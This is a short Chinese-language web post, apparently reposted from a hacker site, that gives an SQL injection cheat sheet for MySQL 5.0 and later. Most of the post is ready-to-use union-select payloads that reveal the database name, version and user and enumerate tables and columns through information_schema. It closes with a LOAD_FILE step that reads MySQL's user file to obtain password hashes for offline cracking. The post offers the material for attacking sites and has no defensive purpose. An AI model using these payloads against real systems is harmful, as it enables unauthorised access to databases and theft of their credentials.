MYSQL5.0以上版本注入命令 -www.hackerschina.org

时间:2014-05-08 19:00:07   收藏:0   阅读:360

一.查看MYSQL基本信息(库名,版本,用户)
and 1=2 union select 1,2,3,database(),5,version(),6,user(),7..../*

二.暴表
and 1=2 union select 1,2,3,TABLE_NAME,4,5,6,7...... from information_schema.TABLES where TABLE_SCHEMA =库的HEX limit 1,1/*

三.暴字段
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7.....from information_schema.COLUMNS where TABLE_NAME=表的HEX limit 1,1/*

关于找不到ROOT密码的爆破:
通过LOAD_FILE(‘‘C:\..\MYSQL\DATA\MYSQL\USER.MYD‘‘)得到用户的HASH散列,之后用CAIN爆破....

MYSQL5.0以上版本注入命令 -www.hackerschina.org,布布扣,bubuko.com

评论(0
© 2014 mamicode.com 版权所有 京ICP备13008772号-2  联系我们:gaon5@hotmail.com
迷上了代码!